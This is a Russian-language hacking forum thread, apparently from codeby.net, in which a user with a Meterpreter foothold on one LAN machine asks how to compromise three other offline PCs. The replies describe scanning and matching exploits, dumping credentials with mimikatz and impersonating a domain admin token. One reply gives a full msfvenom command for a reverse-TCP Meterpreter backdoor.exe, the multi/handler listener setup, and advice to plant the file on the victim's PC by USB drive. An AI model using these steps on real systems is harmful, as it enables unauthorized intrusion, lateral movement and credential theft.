Есть meterpreter на пк он находиться в Lan(local) в сети ещё три ПК они не имеют доступ к инту, как поставить на них meterpreter и получить сессию?
-
15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby
За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.
На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.
Запись на курс до 25 апреля. Получить промодоступ ...
Какая разница? Тебе все гайды подходят - там интернет вообще не нужен. Узнай о настройках DTHC и относительно этого правильно пропиши LHOST.
да ему вообще помоему нужно просто поиметь эти три компа.
1. просканировать сеть,
2. определить версии,
3. подобрать сплоеты,
4. настроить сплоиты,
5. exploit
6. написать статью какие сплоиты куда подошли.(ЗЫ)
1. просканировать сеть,
2. определить версии,
3. подобрать сплоеты,
4. настроить сплоиты,
5. exploit
6. написать статью какие сплоиты куда подошли.(ЗЫ)
BadBlackHat
Platinum
Ну например со скомпроментированной машины arp запросом, выяснить адреса или имена других машин. После попробовать скомпроментировать их)) если сеть доменная или один администратор вытащи пароли, тем же mimikatz. Последний раз захват доменной сети делал с помощью impersonate token админа AD
Простите какими способами можно подобрать эксплоит именно для определенного сервиса + версий ?
Существую какие нибудь простые сканеры которые при сканирований дали простой ответ, есть эксплоит для этого сервиса который подходит 10-90% может использовать)
Searchsploit в принципе ничем не отличается простым search в mete.
Вот допустим в RouterSploit все отлично сделано есть разные сканеры для всех типов роутеров + есть стандартный сканер Autopwn которое сканирует машину на все виды эксплоитов.(да автоматизировано для ленивых, но работает же)
Ну если в Metasploit вопрос решается простым поиском в Searchsploit , потом перебором всех эксплоитов то ладно.
[doublepost=1507963872,1507963019][/doublepost]
Если у тебя есть доступ к этим 3-ем ПК, то самый простой вариант.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.свой ип lport=4444 -f exe -o backdoor.exe
создаем exe файл backdoor.exe и кидаем его через флешку или еще что нибудь на ПК жертвы.
Потом зайти в msfconsole → use exploit/multi/handler → set payload windows/meterpreter/reverse_tcp →
set LHOST 192.168.0.свой Локальный ип
set LPORT 4444
exploit
Если запустить backdoor.exe файл то, вы получите сессию meterprete.
Обрати внимание если Windows 64 битный , то надо использовать windows/x64/meterpreter/reverse_tcp.
Это если у тебя есть доступ к этим Пк, но если нету это уже другая история.
В принципе что бы больше таких вопросов не возникало советую прочитать.
Ссылка скрыта от гостей
https://codeby.net/threads/hack-windows-10-meterpreter.58386/
https://codeby.net/threads/eternalblue-vzlom-windows-pc.59674/
Обучение наступательной кибербезопасности в игровой форме. Начать игру!